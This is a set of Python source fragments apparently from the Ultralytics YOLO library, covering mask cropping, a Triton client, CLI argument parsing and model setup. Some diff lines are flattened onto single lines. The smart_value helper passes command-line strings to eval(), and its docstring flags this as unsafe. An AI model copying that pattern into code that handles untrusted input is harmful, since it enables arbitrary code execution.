    # bottom-right = size + top-left, i.e. x2 = w + x1 and y2 = h + y1
    corners[..., 2:4] = x[..., 2:4] + x[..., :2]
    return corners
def crop_mask(masks, boxes):
    """
    Zero out every mask value that lies outside the mask's own bounding box.

    Args:
        masks (torch.Tensor): [n, h, w] tensor of masks
        boxes (torch.Tensor): [n, 4] tensor of bbox coordinates (x1, y1, x2, y2), in the masks' coordinate space

    Returns:
        (torch.Tensor): The masks multiplied by an inside-the-box indicator; x1/y1 are inclusive and x2/y2 are
            exclusive bounds.
    """
    _, height, width = masks.shape
    left, top, right, bottom = torch.chunk(boxes[:, :, None], 4, 1)  # each of shape(n,1,1)
    xs = torch.arange(width, device=masks.device, dtype=left.dtype)[None, None, :]  # x positions, shape(1,1,w)
    ys = torch.arange(height, device=masks.device, dtype=left.dtype)[None, :, None]  # y positions, shape(1,h,1)

    inside_x = (xs >= left) * (xs < right)
    inside_y = (ys >= top) * (ys < bottom)
    return masks * (inside_x * inside_y)
def scale_masks(masks, shape, padding=True):
    """
    Rescale segment masks to shape.

    The padded border is cropped off first, then the remainder is bilinearly interpolated to `shape`.

    Args:
        masks (torch.Tensor): (N, C, H, W).
        shape (tuple): Height and width.
        padding (bool): If True, the padding is treated as split evenly between both sides (yolo style). If False,
            the crop starts at the top-left corner and all padding is removed from the bottom/right.

    Returns:
        (torch.Tensor): The rescaled masks of shape (N, C, shape[0], shape[1]).
    """
    mask_h, mask_w = masks.shape[2:]
    gain = min(mask_h / shape[0], mask_w / shape[1])  # gain = old / new
    pad_w = mask_w - shape[1] * gain
    pad_h = mask_h - shape[0] * gain

    if padding:
        pad_w /= 2
        pad_h /= 2
        top, left = int(pad_h), int(pad_w)  # y, x
    else:
        top, left = 0, 0
    bottom = int(mask_h - pad_h)
    right = int(mask_w - pad_w)

    cropped = masks[..., top:bottom, left:right]
    return F.interpolate(cropped, shape, mode="bilinear", align_corners=False)  # NCHW
def masks2segments(masks, strategy="all"):
    """
    Convert a batch of masks (n, h, w) into a list of polygon segments (n, xy).

    Args:
        masks (torch.Tensor): Masks of shape (n, h, w); values are cast to int and then uint8 before contour
            extraction.
        strategy (str): 'all' merges and concatenates every external contour of a mask, 'largest' keeps only the
            contour with the most points. Defaults to all

    Returns:
        segments (List): One float32 array of shape (k, 2) per mask; an empty (0, 2) array when no contour is found.
    """
    from ultralytics.data.converter import merge_multi_segment

    segments = []
    for mask in masks.int().cpu().numpy().astype("uint8"):
        contours = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[0]
        if not contours:
            polygon = np.zeros((0, 2))  # no segments found
        elif strategy == "all":  # merge and concatenate all segments
            if len(contours) > 1:
                polygon = np.concatenate(merge_multi_segment([pts.reshape(-1, 2) for pts in contours]))
            else:
                polygon = contours[0].reshape(-1, 2)
        elif strategy == "largest":  # select largest segment
            point_counts = np.array([len(pts) for pts in contours])
            polygon = np.array(contours[point_counts.argmax()]).reshape(-1, 2)
        else:
            polygon = contours  # any other strategy leaves the raw contours untouched
        segments.append(polygon.astype("float32"))
    return segments
class TritonRemoteModel:
    """
    Client for interacting with a remote Triton Inference Server model.

    Attributes:
        endpoint (str): The name of the model on the Triton server.
        url (str): The URL of the Triton server.
        triton_client: The Triton client (either HTTP or gRPC).
        InferInput: The input class for the Triton client.
        InferRequestedOutput: The output request class for the Triton client.
        input_formats (List[str]): The data types of the model inputs.
        np_input_formats (List[type]): The numpy data types of the model inputs.
        input_names (List[str]): The names of the model inputs.
        output_names (List[str]): The names of the model outputs.
    """

    def __init__(self, url: str, endpoint: str = "", scheme: str = ""):
        """
        Initialize the TritonRemoteModel.

        Arguments may be provided individually, or all of them may be parsed from a single 'url' argument of the
        form {scheme}://{netloc}/{endpoint}; only the first path component is used as the endpoint.

        Args:
            url (str): The URL of the Triton server.
            endpoint (str): The name of the model on the Triton server.
            scheme (str): The communication scheme ('http' or 'grpc').
        """
        if not (endpoint or scheme):  # neither given explicitly: derive everything from the URL string
            parts = urlsplit(url)
            endpoint = parts.path.strip("/").split("/")[0]
            scheme = parts.scheme
            url = parts.netloc

        self.endpoint = endpoint
        self.url = url

        # Pick the client module for the scheme; anything other than 'http' uses gRPC
        use_http = scheme == "http"
        if use_http:
            import tritonclient.http as client  # noqa
        else:
            import tritonclient.grpc as client  # noqa

        self.triton_client = client.InferenceServerClient(url=self.url, verbose=False, ssl=False)
        if use_http:
            config = self.triton_client.get_model_config(endpoint)
        else:
            config = self.triton_client.get_model_config(endpoint, as_json=True)["config"]

        # Keep outputs in alphabetical name order, i.e. 'output0', 'output1', etc.
        ordered_outputs = sorted(config["output"], key=lambda item: item.get("name"))
        config["output"] = ordered_outputs
        model_inputs = config["input"]

        # Expose client classes and model metadata as attributes
        type_map = {"TYPE_FP32": np.float32, "TYPE_FP16": np.float16, "TYPE_UINT8": np.uint8}
        self.InferRequestedOutput = client.InferRequestedOutput
        self.InferInput = client.InferInput
        self.input_formats = [entry["data_type"] for entry in model_inputs]
        self.np_input_formats = [type_map[fmt] for fmt in self.input_formats]
        self.input_names = [entry["name"] for entry in model_inputs]
        self.output_names = [entry["name"] for entry in ordered_outputs]

    def __call__(self, *inputs: np.ndarray) -> List[np.ndarray]:
        """
        Call the model with the given inputs.

        Each input is cast to the dtype the model declares for that position before being sent; the outputs
        are cast back to the dtype of the first input.

        Args:
            *inputs (List[np.ndarray]): Input data to the model.

        Returns:
            (List[np.ndarray]): Model outputs.
        """
        input_format = inputs[0].dtype  # outputs are returned in the caller's original dtype
        infer_inputs = []
        for idx, array in enumerate(inputs):
            wanted = self.np_input_formats[idx]
            if array.dtype != wanted:
                array = array.astype(wanted)
            triton_dtype = self.input_formats[idx].replace("TYPE_", "")
            request = self.InferInput(self.input_names[idx], list(array.shape), triton_dtype)
            request.set_data_from_numpy(array)
            infer_inputs.append(request)

        infer_outputs = [self.InferRequestedOutput(name) for name in self.output_names]
        outputs = self.triton_client.infer(model_name=self.endpoint, inputs=infer_inputs, outputs=infer_outputs)

        return [outputs.as_numpy(name).astype(input_format) for name in self.output_names]
# Define valid solutions: CLI name -> (solutions class name, processing method name).
# NOTE: "help" must stay the LAST key, the help messages slice it off with [:-1].
SOLUTION_MAP = {
    "count": ("ObjectCounter", "count"),
    "heatmap": ("Heatmap", "generate_heatmap"),
    "queue": ("QueueManager", "process_queue"),
    "speed": ("SpeedEstimator", "estimate_speed"),
    "workout": ("AIGym", "monitor"),
    "analytics": ("Analytics", "process_data"),
    "trackzone": ("TrackZone", "trackzone"),
    "help": None,
}

# Define valid tasks and modes
MODES = {"train", "val", "predict", "export", "track", "benchmark"}
TASKS = {"detect", "segment", "classify", "pose", "obb"}
# Default dataset per task
TASK2DATA = {
    "detect": "coco8.yaml",
    "segment": "coco8-seg.yaml",
    "classify": "imagenet10",
    "pose": "coco8-pose.yaml",
    "obb": "dota8.yaml",
}
# Default model weights per task
TASK2MODEL = {
    "detect": "yolo11n.pt",
    "segment": "yolo11n-seg.pt",
    "classify": "yolo11n-cls.pt",
    "pose": "yolo11n-pose.pt",
    "obb": "yolo11n-obb.pt",
}
# Metric key reported per task
TASK2METRIC = {
    "detect": "metrics/mAP50-95(B)",
    "segment": "metrics/mAP50-95(M)",
    "classify": "metrics/accuracy_top1",
    "pose": "metrics/mAP50-95(P)",
    "obb": "metrics/mAP50-95(B)",
}
MODELS = {TASK2MODEL[task] for task in TASKS}

ARGV = sys.argv or ["", ""]  # sometimes sys.argv = []
# Usage text for 'yolo solutions'. The heatmap example uses cv2.COLORMAP_PARULA, the actual OpenCV constant name.
SOLUTIONS_HELP_MSG = f"""
    Arguments received: {str(['yolo'] + ARGV[1:])}. Ultralytics 'yolo solutions' usage overview:

        yolo solutions SOLUTION ARGS

        Where SOLUTION (optional) is one of {list(SOLUTION_MAP.keys())[:-1]}
              ARGS (optional) are any number of custom 'arg=value' pairs like 'show_in=True' that override defaults
                  at https://docs.ultralytics.com/usage/cfg

    1. Call object counting solution
        yolo solutions count source="path/to/video/file.mp4" region=[(20, 400), (1080, 400), (1080, 360), (20, 360)]

    2. Call heatmaps solution
        yolo solutions heatmap colormap=cv2.COLORMAP_PARULA model=yolo11n.pt

    3. Call queue management solution
        yolo solutions queue region=[(20, 400), (1080, 400), (1080, 360), (20, 360)] model=yolo11n.pt

    4. Call workouts monitoring solution for push-ups
        yolo solutions workout model=yolo11n-pose.pt kpts=[6, 8, 10]

    5. Generate analytical graphs
        yolo solutions analytics analytics_type="pie"

    6. Track objects within specific zones
        yolo solutions trackzone source="path/to/video/file.mp4" region=[(150, 150), (1130, 150), (1130, 570), (150, 570)]
    """
def cfg2dict(cfg):
    """
    Return a configuration object in dictionary form.

    Args:
        cfg (str | Path | Dict | SimpleNamespace): Configuration to convert. A string or Path is loaded with
            `yaml_load`, a SimpleNamespace is converted with `vars()`, anything else is returned as-is.

    Returns:
        (Dict): Configuration object in dictionary format.

    Examples:
        Convert a YAML file path to a dictionary:
        >>> config_dict = cfg2dict("config.yaml")

        Convert a SimpleNamespace to a dictionary:
        >>> from types import SimpleNamespace
        >>> config_sn = SimpleNamespace(param1="value1", param2="value2")
        >>> config_dict = cfg2dict(config_sn)

        Pass through an already existing dictionary:
        >>> config_dict = cfg2dict({"param1": "value1", "param2": "value2"})

    Notes:
        - The dictionary obtained from a SimpleNamespace is the namespace's own attribute dict, not a copy.
        - A dictionary input is returned unchanged (same object).
    """
    if isinstance(cfg, SimpleNamespace):
        return vars(cfg)  # namespace attributes as a dict
    if isinstance(cfg, (str, Path)):
        return yaml_load(cfg)  # file path: load its YAML content
    return cfg
def check_cfg(cfg, hard=True):
    """
    Checks configuration argument types and values for the Ultralytics library.

    This function validates the types and values of configuration arguments, ensuring correctness and converting
    them if necessary. It checks for specific key types defined in global variables such as CFG_FLOAT_KEYS,
    CFG_FRACTION_KEYS, CFG_INT_KEYS, and CFG_BOOL_KEYS.

    Args:
        cfg (Dict): Configuration dictionary to validate.
        hard (bool): If True, raises TypeError for values of an invalid type; if False, attempts to convert them.

    Raises:
        TypeError: If `hard` is True and a value has an invalid type for its key.
        ValueError: If a fraction key is outside [0.0, 1.0]. This is raised regardless of `hard`.

    Examples:
        >>> config = {
        ...     "epochs": "50",  # string, converted to int in soft mode
        ...     "lr0": 0.01,  # valid fraction
        ...     "save": "false",  # string, converted to bool in soft mode
        ... }
        >>> check_cfg(config, hard=False)
        >>> print(config)
        {'epochs': 50, 'lr0': 0.01, 'save': False}

    Notes:
        - The function modifies the input dictionary in-place.
        - None values are ignored as they may be from optional arguments.
        - Fraction keys are checked to be within the range [0.0, 1.0].
        - In soft mode the strings 'true'/'false' (any case) map to True/False for bool keys; other values use
          Python truthiness.
    """
    for k, v in cfg.items():
        if v is not None:  # None values may be from optional args
            if k in CFG_FLOAT_KEYS and not isinstance(v, (int, float)):
                if hard:
                    raise TypeError(
                        f"'{k}={v}' is of invalid type {type(v).__name__}. "
                        f"Valid '{k}' types are int (i.e. '{k}=0') or float (i.e. '{k}=0.5')"
                    )
                cfg[k] = float(v)
            elif k in CFG_FRACTION_KEYS:
                if not isinstance(v, (int, float)):
                    if hard:
                        raise TypeError(
                            f"'{k}={v}' is of invalid type {type(v).__name__}. "
                            f"Valid '{k}' types are int (i.e. '{k}=0') or float (i.e. '{k}=0.5')"
                        )
                    cfg[k] = v = float(v)
                # Range check applies to converted values too and is never softened
                if not (0.0 <= v <= 1.0):
                    raise ValueError(f"'{k}={v}' is an invalid value. " f"Valid '{k}' values are between 0.0 and 1.0.")
            elif k in CFG_INT_KEYS and not isinstance(v, int):
                if hard:
                    raise TypeError(
                        f"'{k}={v}' is of invalid type {type(v).__name__}. " f"'{k}' must be an int (i.e. '{k}=8')"
                    )
                cfg[k] = int(v)
            elif k in CFG_BOOL_KEYS and not isinstance(v, bool):
                if hard:
                    raise TypeError(
                        f"'{k}={v}' is of invalid type {type(v).__name__}. "
                        f"'{k}' must be a bool (i.e. '{k}=True' or '{k}=False')"
                    )
                # bool("false") is True, so textual booleans must be parsed rather than truth-tested
                text = v.strip().lower() if isinstance(v, str) else None
                cfg[k] = (text == "true") if text in {"true", "false"} else bool(v)
def _deprecated_flag_enabled(value):
    """Return True if a deprecated 'hide_*' value means 'hide'; the text 'false' (any case) and falsy values do not."""
    if isinstance(value, str):
        return value.strip().lower() != "false"
    return bool(value)


def _handle_deprecation(custom):
    """
    Handles deprecated configuration keys by mapping them to current equivalents with deprecation warnings.

    Args:
        custom (Dict): Configuration dictionary potentially containing deprecated keys.

    Returns:
        (Dict): The same dictionary object, updated in-place.

    Examples:
        >>> custom_config = {"boxes": True, "hide_labels": "False", "line_thickness": 2}
        >>> _handle_deprecation(custom_config)
        >>> print(custom_config)
        {'show_boxes': True, 'show_labels': True, 'line_width': 2}

    Notes:
        This function modifies the input dictionary in-place, replacing deprecated keys with their current
        equivalents. 'hide_labels' and 'hide_conf' are inverted into 'show_labels' and 'show_conf'; both the
        textual form ("False") and an already-parsed boolean (False) are understood. 'label_smoothing' is
        dropped without a replacement.
    """
    renamed = {"boxes": "show_boxes", "line_thickness": "line_width"}  # value carried over unchanged
    inverted = {"hide_labels": "show_labels", "hide_conf": "show_conf"}  # value logically negated

    for key in list(custom):  # iterate over a snapshot, the dict is mutated below
        if key in renamed:
            deprecation_warn(key, renamed[key])
            custom[renamed[key]] = custom.pop(key)
        elif key in inverted:
            deprecation_warn(key, inverted[key])
            # Values parsed from the CLI are real booleans, so comparing against the string "False" is not enough
            custom[inverted[key]] = not _deprecated_flag_enabled(custom.pop(key))
        elif key == "label_smoothing":
            deprecation_warn(key)
            custom.pop(key)

    return custom
def merge_equals_args(args: List[str]) -> List[str]:
    """
    Merges arguments around isolated '=' in a list of strings and joins fragments with brackets.

    This function handles the following cases:
        1. ['arg', '=', 'val'] becomes ['arg=val']
        2. ['arg=', 'val'] becomes ['arg=val']
        3. ['arg', '=val'] becomes ['arg=val']
        4. Joins fragments with brackets, e.g., ['imgsz=[3,', '640,', '640]'] becomes ['imgsz=[3,640,640]']

    The '=' merging runs first and the bracket joining runs on its result, so a bracketed value that was split
    from its key is still joined, e.g. ['imgsz=', '[3,', '640]'] becomes ['imgsz=[3,640]'].

    Args:
        args (List[str]): A list of strings where each element represents an argument or fragment.

    Returns:
        (List[str]): A list of strings where the arguments around isolated '=' are merged and fragments with
            brackets are joined. Fragments with unbalanced brackets are concatenated into the last element.

    Examples:
        >>> args = ["arg1", "=", "value", "arg2=", "value2", "arg3", "=value3", "imgsz=[3,", "640,", "640]"]
        >>> merge_equals_args(args)
        ['arg1=value', 'arg2=value2', 'arg3=value3', 'imgsz=[3,640,640]']
    """
    # Pass 1: glue fragments that were separated around an '=' sign
    merged = []
    last = len(args) - 1
    i = 0
    while i <= last:
        arg = args[i]
        if arg == "=" and merged and i < last:  # merge ['arg', '=', 'val']
            merged[-1] += f"={args[i + 1]}"
            i += 2
        elif arg.endswith("=") and i < last and "=" not in args[i + 1]:  # merge ['arg=', 'val']
            merged.append(f"{arg}{args[i + 1]}")
            i += 2
        elif arg.startswith("=") and merged:  # merge ['arg', '=val']
            merged[-1] += arg
            i += 1
        else:
            merged.append(arg)
            i += 1

    # Pass 2: join consecutive tokens until the square brackets opened so far are balanced again
    new_args = []
    current = ""
    depth = 0
    for token in merged:
        depth += token.count("[") - token.count("]")
        current += token
        if depth == 0:
            new_args.append(current)
            current = ""

    # Append any remaining (unbalanced) fragment instead of dropping it
    if current:
        new_args.append(current)

    return new_args
+ """ + from ultralytics import hub + + if args[0] == "login": + key = args[1] if len(args) > 1 else "" + # Log in to Ultralytics HUB using the provided API key + hub.login(key) + elif args[0] == "logout": + # Log out from Ultralytics HUB + hub.logout() + + +def handle_yolo_settings(args: List[str]) -> None: + """ + Handles YOLO settings command-line interface (CLI) commands. + + This function processes YOLO settings CLI commands such as reset and updating individual settings. It should be + called when executing a script with arguments related to YOLO settings management. + + Args: + args (List[str]): A list of command line arguments for YOLO settings management. + + Examples: + >>> handle_yolo_settings(["reset"]) # Reset YOLO settings + >>> handle_yolo_settings(["default_cfg_path=yolo11n.yaml"]) # Update a specific setting + + Notes: + - If no arguments are provided, the function will display the current settings. + - The 'reset' command will delete the existing settings file and create new default settings. + - Other arguments are treated as key-value pairs to update specific settings. + - The function will check for alignment between the provided settings and the existing ones. + - After processing, the updated settings will be displayed. 
def handle_yolo_solutions(args: List[str]) -> None:
    """
    Processes YOLO solutions arguments and runs the specified computer vision solutions pipeline.

    Args:
        args (List[str]): Command-line arguments for configuring and running the Ultralytics YOLO
            solutions: https://docs.ultralytics.com/solutions/, It can include solution name, source,
            and other configuration parameters. The solution name, if present, is popped from this list.

    Returns:
        None: The function processes video frames and saves the output but doesn't return any value.

    Examples:
        Run people counting solution with default settings:
        >>> handle_yolo_solutions(["count"])

        Run analytics with custom configuration:
        >>> handle_yolo_solutions(["analytics", "conf=0.25", "source=path/to/video/file.mp4"])

    Notes:
        - Valid argument names are the keys of DEFAULT_SOL_DICT and DEFAULT_CFG_DICT
        - Arguments can be provided in the format 'key=value' or as boolean flags
        - Available solutions are defined in SOLUTION_MAP with their respective classes and methods
        - If an invalid solution is provided, defaults to 'count' solution
        - Output is written to 'solution.avi' inside a directory obtained from increment_path, starting
          from 'runs/solutions/exp'
        - For 'analytics' solution, frame numbers are tracked for generating analytical graphs
        - Video processing can be interrupted by pressing 'q'
        - Both the video reader and the video writer are released when processing ends or fails
    """
    full_args_dict = {**DEFAULT_SOL_DICT, **DEFAULT_CFG_DICT}  # arguments dictionary
    overrides = {}

    # check dictionary alignment
    for arg in merge_equals_args(args):
        arg = arg.lstrip("-").rstrip(",")
        if "=" in arg:
            try:
                k, v = parse_key_value_pair(arg)
                overrides[k] = v
            except (NameError, SyntaxError, ValueError, AssertionError) as e:
                check_dict_alignment(full_args_dict, {arg: ""}, e)
        elif arg in full_args_dict and isinstance(full_args_dict.get(arg), bool):
            overrides[arg] = True  # bare boolean flag
    check_dict_alignment(full_args_dict, overrides)  # dict alignment

    # Get solution name
    if args and args[0] in SOLUTION_MAP:
        if args[0] == "help":  # `yolo solutions help`: print usage and stop
            LOGGER.info(SOLUTIONS_HELP_MSG)
            return
        s_n = args.pop(0)  # Extract the solution name directly
    else:
        LOGGER.warning(
            f"⚠️ No valid solution provided. Using default 'count'. Available: {', '.join(SOLUTION_MAP.keys())}"
        )
        s_n = "count"  # Default solution if none provided

    if args and args[0] == "help":  # 'help' directly after the solution name also stops here
        return

    cls, method = SOLUTION_MAP[s_n]  # solution class name, method name

    from ultralytics import solutions  # import ultralytics solutions
    from ultralytics.utils.files import increment_path  # for output directory path update

    solution = getattr(solutions, cls)(IS_CLI=True, **overrides)  # get solution class i.e ObjectCounter
    process = getattr(solution, method)  # get specific function of class for processing i.e, count from ObjectCounter

    cap = cv2.VideoCapture(solution.CFG["source"])  # read the video file

    # extract width, height and fps of the video file, create save directory and initialize video writer
    w, h, fps = (int(cap.get(x)) for x in (cv2.CAP_PROP_FRAME_WIDTH, cv2.CAP_PROP_FRAME_HEIGHT, cv2.CAP_PROP_FPS))
    if s_n == "analytics":  # analytical graphs follow fixed shape for output i.e w=1920, h=1080
        w, h = 1920, 1080
    save_dir = increment_path(Path("runs") / "solutions" / "exp", exist_ok=False)
    save_dir.mkdir(parents=True, exist_ok=True)  # create the output directory
    vw = cv2.VideoWriter(str(save_dir / "solution.avi"), cv2.VideoWriter_fourcc(*"mp4v"), fps, (w, h))

    try:  # Process video frames
        f_n = 0  # frame number, required for analytical graphs
        while cap.isOpened():
            success, frame = cap.read()
            if not success:
                break
            frame = process(frame, f_n := f_n + 1) if s_n == "analytics" else process(frame)
            vw.write(frame)
            if cv2.waitKey(1) & 0xFF == ord("q"):
                break
    finally:
        cap.release()
        vw.release()  # finalize the output file; previously the writer was left open
def smart_value(v):
    """
    Convert the string form of a value into a matching Python object.

    The words 'none', 'true' and 'false' are recognized in any letter case. Every other string is handed to
    Python's eval(); if evaluation fails for any reason the string itself is returned.

    Args:
        v (str): The string representation of the value to be converted.

    Returns:
        (Any): The converted value. The type can be None, bool, int, float, any other object eval() produces,
            or the original string if no conversion is applicable.

    Examples:
        >>> smart_value("42")
        42
        >>> smart_value("3.14")
        3.14
        >>> smart_value("True")
        True
        >>> smart_value("None")
        None
        >>> smart_value("some_string")
        'some_string'

    Notes:
        - eval() runs arbitrary expressions with this module's names in scope, which is unsafe on untrusted
          input; only pass strings that come from a trusted command line.
    """
    lowered = v.lower()
    if lowered == "none":
        return None
    if lowered in ("true", "false"):
        return lowered == "true"
    try:
        return eval(v)
    except Exception:
        return v  # not a Python expression: keep the raw string
+ + Examples: + Train a detection model for 10 epochs with an initial learning_rate of 0.01: + >>> entrypoint("train data=coco8.yaml model=yolo11n.pt epochs=10 lr0=0.01") + + Predict a YouTube video using a pretrained segmentation model at image size 320: + >>> entrypoint("predict model=yolo11n-seg.pt source='https://youtu.be/LNwODJXcvt4' imgsz=320") + + Validate a pretrained detection model at batch-size 1 and image size 640: + >>> entrypoint("val model=yolo11n.pt data=coco8.yaml batch=1 imgsz=640") + + Notes: + - If no arguments are passed, the function will display the usage help message. + - For a list of all available commands and their arguments, see the provided help messages and the + Ultralytics documentation at https://docs.ultralytics.com. + """ + args = (debug.split(" ") if debug else ARGV)[1:] + if not args: # no arguments passed + LOGGER.info(CLI_HELP_MSG) + return + + special = { + "help": lambda: LOGGER.info(CLI_HELP_MSG), + "checks": checks.collect_system_info, + "version": lambda: LOGGER.info(__version__), + "settings": lambda: handle_yolo_settings(args[1:]), + "cfg": lambda: yaml_print(DEFAULT_CFG_PATH), + "hub": lambda: handle_yolo_hub(args[1:]), + "login": lambda: handle_yolo_hub(args), + "logout": lambda: handle_yolo_hub(args), + "copy-cfg": copy_default_cfg, + "streamlit-predict": lambda: handle_streamlit_inference(), + "solutions": lambda: handle_yolo_solutions(args[1:]), + } + full_args_dict = {**DEFAULT_CFG_DICT, **{k: None for k in TASKS}, **{k: None for k in MODES}, **special} + + # Define common misuses of special commands, i.e. -h, -help, --help + special.update({k[0]: v for k, v in special.items()}) # singular + special.update({k[:-1]: v for k, v in special.items() if len(k) > 1 and k.endswith("s")}) # singular + special = {**special, **{f"-{k}": v for k, v in special.items()}, **{f"--{k}": v for k, v in special.items()}} + + overrides = {} # basic overrides, i.e. 
imgsz=320 + for a in merge_equals_args(args): # merge spaces around '=' sign + if a.startswith("--"): + LOGGER.warning(f"WARNING ⚠️ argument '{a}' does not require leading dashes '--', updating to '{a[2:]}'.") + a = a[2:] + if a.endswith(","): + LOGGER.warning(f"WARNING ⚠️ argument '{a}' does not require trailing comma ',', updating to '{a[:-1]}'.") + a = a[:-1] + if "=" in a: + try: + k, v = parse_key_value_pair(a) + if k == "cfg" and v is not None: # custom.yaml passed + LOGGER.info(f"Overriding {DEFAULT_CFG_PATH} with {v}") + overrides = {k: val for k, val in yaml_load(checks.check_yaml(v)).items() if k != "cfg"} + else: + overrides[k] = v + except (NameError, SyntaxError, ValueError, AssertionError) as e: + check_dict_alignment(full_args_dict, {a: ""}, e) + + elif a in TASKS: + overrides["task"] = a + elif a in MODES: + overrides["mode"] = a + elif a.lower() in special: + special[a.lower()]() + return + elif a in DEFAULT_CFG_DICT and isinstance(DEFAULT_CFG_DICT[a], bool): + overrides[a] = True # auto-True for default bool args, i.e. 'yolo show' sets show=True + elif a in DEFAULT_CFG_DICT: + raise SyntaxError( + f"'{colorstr('red', 'bold', a)}' is a valid YOLO argument but is missing an '=' sign " + f"to set its value, i.e. try '{a}={DEFAULT_CFG_DICT[a]}'\n{CLI_HELP_MSG}" + ) + else: + check_dict_alignment(full_args_dict, {a: ""}) + + # Check keys + check_dict_alignment(full_args_dict, overrides) + + # Mode + mode = overrides.get("mode") + if mode is None: + mode = DEFAULT_CFG.mode or "predict" + LOGGER.warning(f"WARNING ⚠️ 'mode' argument is missing. Valid modes are {MODES}. Using default 'mode={mode}'.") + elif mode not in MODES: + raise ValueError(f"Invalid 'mode={mode}'. Valid modes are {MODES}.\n{CLI_HELP_MSG}") + + # Task + task = overrides.pop("task", None) + if task: + if task not in TASKS: + raise ValueError(f"Invalid 'task={task}'. 
Valid tasks are {TASKS}.\n{CLI_HELP_MSG}") + if "model" not in overrides: + overrides["model"] = TASK2MODEL[task] + + # Model + model = overrides.pop("model", DEFAULT_CFG.model) + if model is None: + model = "yolo11n.pt" + LOGGER.warning(f"WARNING ⚠️ 'model' argument is missing. Using default 'model={model}'.") + overrides["model"] = model + stem = Path(model).stem.lower() + if "rtdetr" in stem: # guess architecture + from ultralytics import RTDETR + + model = RTDETR(model) # no task argument + elif "fastsam" in stem: + from ultralytics import FastSAM + + model = FastSAM(model) + elif "sam_" in stem or "sam2_" in stem or "sam2.1_" in stem: + from ultralytics import SAM + + model = SAM(model) + else: + from ultralytics import YOLO + + model = YOLO(model, task=task) + if isinstance(overrides.get("pretrained"), str): + model.load(overrides["pretrained"]) + + # Task Update + if task != model.task: + if task: + LOGGER.warning( + f"WARNING ⚠️ conflicting 'task={task}' passed with 'task={model.task}' model. " + f"Ignoring 'task={task}' and updating to 'task={model.task}' to match model." + ) + task = model.task + + # Mode + if mode in {"predict", "track"} and "source" not in overrides: + overrides["source"] = ( + "https://ultralytics.com/images/boats.jpg" if task == "obb" else DEFAULT_CFG.source or ASSETS + ) + LOGGER.warning(f"WARNING ⚠️ 'source' argument is missing. Using default 'source={overrides['source']}'.") + elif mode in {"train", "val"}: + if "data" not in overrides and "resume" not in overrides: + overrides["data"] = DEFAULT_CFG.data or TASK2DATA.get(task or DEFAULT_CFG.task, DEFAULT_CFG.data) + LOGGER.warning(f"WARNING ⚠️ 'data' argument is missing. Using default 'data={overrides['data']}'.") + elif mode == "export": + if "format" not in overrides: + overrides["format"] = DEFAULT_CFG.format or "torchscript" + LOGGER.warning(f"WARNING ⚠️ 'format' argument is missing. 
def copy_default_cfg():
    """
    Writes a copy of the default configuration file into the current working directory.

    The copy keeps the name of DEFAULT_CFG_PATH with '.yaml' replaced by '_copy.yaml'. After copying, an info
    message is logged with the source path, the new file's location and an example YOLO command that uses the
    new file as a custom cfg.

    Examples:
        >>> copy_default_cfg()
        # Output: default.yaml copied to /path/to/current/directory/default_copy.yaml
        # Example YOLO command with this new custom cfg:
        #   yolo cfg='/path/to/current/directory/default_copy.yaml' imgsz=320 batch=8

    Notes:
        - The original default configuration file is only read, never modified.
        - `shutil.copy2` is used, so file metadata is copied along with the contents where possible.
    """
    copy_name = DEFAULT_CFG_PATH.name.replace(".yaml", "_copy.yaml")
    new_file = Path.cwd() / copy_name
    shutil.copy2(DEFAULT_CFG_PATH, new_file)
    message = (
        f"{DEFAULT_CFG_PATH} copied to {new_file}\n"
        f"Example YOLO command with this new custom cfg:\n yolo cfg='{new_file}' imgsz=320 batch=8"
    )
    LOGGER.info(message)
+ ckpt (Dict): The checkpoint data if the model is loaded from a *.pt file. + cfg (str): The configuration of the model if loaded from a *.yaml file. + ckpt_path (str): The path to the checkpoint file. + overrides (Dict): A dictionary of overrides for model configuration. + metrics (Dict): The latest training/validation metrics. + session (HUBTrainingSession): The Ultralytics HUB session, if applicable. + task (str): The type of task the model is intended for. + model_name (str): The name of the model. + + Methods: + __call__: Alias for the predict method, enabling the model instance to be callable. + _new: Initializes a new model based on a configuration file. + _load: Loads a model from a checkpoint file. + _check_is_pytorch_model: Ensures that the model is a PyTorch model. + reset_weights: Resets the model's weights to their initial state. + load: Loads model weights from a specified file. + save: Saves the current state of the model to a file. + info: Logs or returns information about the model. + fuse: Fuses Conv2d and BatchNorm2d layers for optimized inference. + predict: Performs object detection predictions. + track: Performs object tracking. + val: Validates the model on a dataset. + benchmark: Benchmarks the model on various export formats. + export: Exports the model to different formats. + train: Trains the model on a dataset. + tune: Performs hyperparameter tuning. + _apply: Applies a function to the model's tensors. + add_callback: Adds a callback function for an event. + clear_callback: Clears all callbacks for an event. + reset_callbacks: Resets all callbacks to their default functions. 
def __init__(
    self,
    model: Union[str, Path] = "yolo11n.pt",
    task: str = None,
    verbose: bool = False,
) -> None:
    """
    Sets up a model wrapper from a weights file, a YAML config, a HUB URL or a Triton Server URL.

    All bookkeeping attributes are initialised first. The `model` argument is then normalised to a stripped
    string and dispatched:
      - an Ultralytics HUB model URL is resolved to a model file through a HUB session, then loaded as usual;
      - a Triton Server URL is stored as-is and the constructor returns early;
      - a '.yaml' / '.yml' path builds a new model via `_new`;
      - anything else is loaded via `_load`.

    Args:
        model (Union[str, Path]): Path or name of the model to load or create.
        task (str | None): The task type associated with the model. For Triton models it defaults to 'detect'.
        verbose (bool): Forwarded to `_new` when a model is built from a YAML config.

    Examples:
        >>> model = Model("yolo11n.pt")
        >>> model = Model("path/to/model.yaml", task="detect")
    """
    super().__init__()

    # Bookkeeping state, filled in later by _new/_load and by the individual modes
    self.callbacks = callbacks.get_default_callbacks()
    self.predictor = None  # reused across predict calls
    self.model = None  # underlying model object (or a path/URL string for non-PyTorch backends)
    self.trainer = None
    self.ckpt = None  # only populated when loaded from *.pt
    self.cfg = None  # only populated when built from *.yaml
    self.ckpt_path = None
    self.overrides = {}  # overrides passed on to trainer/predictor/etc.
    self.metrics = None  # latest validation/training metrics
    self.session = None  # HUB session
    self.task = task

    source = str(model).strip()

    if self.is_hub_model(source):
        # Ultralytics HUB model from https://hub.ultralytics.com: resolve it to a model file
        checks.check_requirements("hub-sdk>=0.0.12")
        hub_session = HUBTrainingSession.create_session(source)
        source = hub_session.model_file
        if hub_session.train_args:  # training sent from HUB
            self.session = hub_session
    elif self.is_triton_model(source):
        # Triton Server model: nothing to load locally, keep the URL and stop here
        self.model_name = source
        self.model = source
        self.overrides["task"] = task or "detect"  # set `task=detect` if not explicitly set
        return

